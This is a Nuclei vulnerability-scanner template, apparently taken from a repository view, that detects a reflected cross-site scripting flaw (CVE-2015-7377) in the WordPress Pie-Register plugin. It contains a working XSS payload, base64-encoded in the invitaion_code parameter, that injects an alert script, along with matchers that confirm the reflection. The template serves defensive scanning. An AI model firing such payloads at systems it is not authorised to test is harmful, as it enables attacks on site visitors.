nuclei-templates/cves/2015/CVE-2015-7377.yaml

33 lines
1.1 KiB
YAML
Raw Normal View History

2021-09-21 08:41:11 +00:00
id: CVE-2015-7377
info:
name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference:
- https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7377
tags: cve,cve2015,wordpress,wp-plugin,xss
description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI."
2021-09-21 08:41:11 +00:00
requests:
- method: GET
path:
2021-09-21 09:42:50 +00:00
- "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
2021-09-21 08:41:11 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-09-21 09:42:50 +00:00
- "</script><script>alert(document.domain)</script>"
2021-09-21 08:41:11 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200